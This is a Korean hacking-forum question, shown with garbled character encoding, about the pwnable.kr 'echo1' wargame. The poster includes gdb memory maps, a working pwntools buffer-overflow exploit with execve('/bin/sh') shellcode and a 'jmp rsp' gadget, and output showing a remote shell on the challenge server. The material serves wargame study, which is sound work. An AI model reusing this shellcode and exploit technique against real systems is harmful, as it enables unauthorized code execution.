½Ã½ºÅÛ ÇØÅ·

 1574, 79/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   turttle2s
   pwnable.kr echo1 Áú¹®2 (½ºÆ÷ ÁÖÀÇ)

http://www.hackerschool.org/HS_Boards/zboard.php?desc=desc&no=2011 [º¹»ç]


ÀÌÀü±Û http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=2000

ÀÌÀü¿¡ echo1  Ç®À̸¦ ºÁµµ ÀÌÇØ°¡ ¾È°¡¼­ Áú¹®±ÛÀ» ¿Ã·È¾ú´Âµ¥, ÇØ°áÀÌ ¾ÈµÅ¼­ ´ÙÀ½¿¡ º¸°Ú´Ù°íÇÏ°í ³Ñ¾î°¬½À´Ï´Ù.

À̹ø¿¡ echo1 ¹®Á¦¸¦ ´Ù½Ãº¸´Âµ¥ ¿©ÀüÈ÷ ÀÌÇØ°¡ °¡Áö ¾Ê½À´Ï´Ù.

ºÐ¸íÈ÷ echo1¿¡¼­ ¿À¹öÇ÷ΰ¡ ¹ß»ýÇÏ°í, NX°¡ Àû¿ëµÇ¾îÀÖÁö ¾Ê¾Æ ½©Äڵ带 ½ÇÇà½ÃÅ°´Â ¹®Á¦·Î º¸ÀÔ´Ï´Ù. ±×·±µ¥ ¾î¶»°Ô ½ÇÇàÀ» ½Ãų°ÍÀΰ¡°¡ °ü°ÇÀε¥, Ç®À̸¦ º¸´Ï id ¿µ¿ª¿¡ jmp rspÀÇ opcode(\xff\xe4)¸¦ ÀúÀåÇÏ°í ÀÌ°É ½ÇÇà½ÃÅ°´õ¶ó±¸¿ä. (rsp´Â ½©Äڵ带 °¡¸®Å°°íÀÖ½À´Ï´Ù.)

¹®Á¦´Â id ¿µ¿ª¿¡´Â ½ÇÇà±ÇÇÑÀÌ ¾ø¾î¼­ opcode¸¦ ÀúÀåÇصµ ½ÇÇàÇÒ¼ö°¡ ¾ø½À´Ï´Ù.
±×·¡¼­ rip¸¦ id·Î Á¶ÀýÇÑ´Ù°íÇصµ, ½ÇÇàÇÏ·Á°íÇϸé SIGSEGV°¡ ¹ß»ýÇÕ´Ï´Ù. ·ÎÄÿ¡¼­´Â¿ä.
±Ùµ¥ ¸®¸ðÆ®·ÎÇϸé Àß µË´Ï´Ù?  Á» È¥¶õ½º·¯¿îµ¥ ¹» ³õÄ¡°íÀִ°ɱî¿ä..

[µð¹ö±ë Á¤º¸]

(gdb) info proc
process 165283
cmdline = '/home/ubuntu/ctf/echo1'
cwd = '/home/ubuntu/ctf'
exe = '/home/ubuntu/ctf/echo1'


(gdb) !cat /proc/165283/maps
00400000-00401000 r-xp 00000000 ca:01 785621                             /home/ubuntu/ctf/echo1
00601000-00602000 r--p 00001000 ca:01 785621                             /home/ubuntu/ctf/echo1
00602000-00603000 rw-p 00002000 ca:01 785621                             /home/ubuntu/ctf/echo1   // ¿©±â´Â ½ÇÇà±ÇÇÑÀÌ ¾øÀ½.
(»ý·«)
7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0                          [stack]   // ¿©±â´Â ½ÇÇà±ÇÇÑÀÌ ÀÖÀ½
(»ý·«)


(gdb) p &id
$2 = (<data variable, no debug info> *) 0x6020a0 <id>


[Àͽº ÄÚµå]
from pwn import *

#e = ELF("./echo1")
jmp_rsp = b"\xff\xe4"
sc = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
p = remote("pwnable.kr", 9010)
#p = process("./echo1")

name = jmp_rsp
name_addr = 0x6020a0
p.sendline(name)
print(p.recvuntil(b"> "))
p.sendline(b"1")        # 1. BOF

payload = b"a"*0x20 + b"b"*0x8   # buf + rbp
payload += p64(name_addr)   # ret
payload += sc
p.sendline(payload)

p.interactive()


[½ÇÇà °á°ú]
$ python echo1.py
[+] Opening connection to pwnable.kr on port 9010: Done
b"hey, what's your name? : \n- select echo type -\n- 1. : BOF echo\n- 2. : FSB echo\n- 3. : UAF echo\n- 4. : exit\n> "
[*] Switching to interactive mode
hello \xff\xe4
$          aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbb\xa0 `
goodbye \xff\xe4
$              id
uid=1053(echo1) gid=1053(echo1) groups=1053(echo1)
  Hit : 1363     Date : 2022/10/05 12:21


    
turttle2s https://ray3708.tistory.com/28

½ÇÁ¦·Î µ¥ÀÌÅÍ ¿µ¿ª¿¡µµ ½ÇÇà±ÇÇÑÀÌ ÀÖ°í, ·ÎÄÿ¡¼­ Àû¿ëÀÌ ¾ÈµÈ ÀÌÀ¯´Â Ä¿³Î ¹öÀü Â÷À̶ó°í ÇÕ´Ï´Ù		 2022/11/02  
turttle2s ¹®Á¦ ¼­¹ö¿¡ µé¾î°¡¼­ È®ÀÎÇغ¼ »ý°¢À» ¾ÈÇ߳׿ä 2022/11/02  
14   »ç±â[2]     jas08
 03/31 2052
13   ÆÐŶ º¹È£È­¸¦ ¸¶½ºÅÍ ÇÏ·Á¸é ¾î¶² °úÁ¤ÀÌ ÀÖ¾î¾ßÇϳª¿ä?     sa0814
 04/01 1758
12   dllÀÎÁ§¼Ç ½ÇÇèÁß Áú¹® µå¸³´Ï´Ù.[1]     kkk477
 05/31 1914
11   Trainer3 ftz.hackerschool.org È£½ºÆ® Á¢¼Ó ºÒ°¡[1]     hyemin1826
 07/18 3306
10   Level2 -> Level3 ¿¡¼­ vi¿Í /usr/bin/EditorÀÇ Â÷ÀÌ[2]     hyemin1826
 07/18 1957
9   ROP strcpy °ü·Ã Áú¹®ÀÔ´Ï´Ù.[3]     heeyoung0511
 06/16 1643
8   pwnable.kr echo1 Áú¹®[2]     turttle2s
 06/17 1826
7   ½ºÅÿ¡ µ¥ÀÌÅÍ ³ÖÀ» ¶§ SIGSEGV[4]     turttle2s
 02/04 1561
6   ÇØÅ· ÇÁ¸®¼­¹ö ¾ø¾îÁ³³ª¿ä?[1]     terfkim
 04/15 1818
5   ¸®¸ðÆ® ȯ°æ¿¡¼­ÀÇ ½ºÅà ÁÖ¼Ò È®ÀÎ ¹æ¹ýÀÌ ±Ã±ÝÇÕ´Ï´Ù.[2]     lMaxl04
 06/16 1009
4   ASLRÀÌ °É·ÁÀÖÀ»¶§ ret¿¡ ROPÀ¸·Î jmp %espÀ» »ç¿ëÇÑ °æ¿ì.[3]     lMaxl04
 06/29 1244
3   libc°ü·Ã - 2[5]     lMaxl04
 08/24 964
2   LOB GATE¹®Á¦ Ç®¸é¼­ ±Ã±ÝÇÑÁ¡[3]     hackxx123
 08/24 1071
  pwnable.kr echo1 Áú¹®2 (½ºÆ÷ ÁÖÀÇ)[2]     turttle2s
 10/05 1362
[1]..[71][72][73][74][75][76][77][78] 79

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org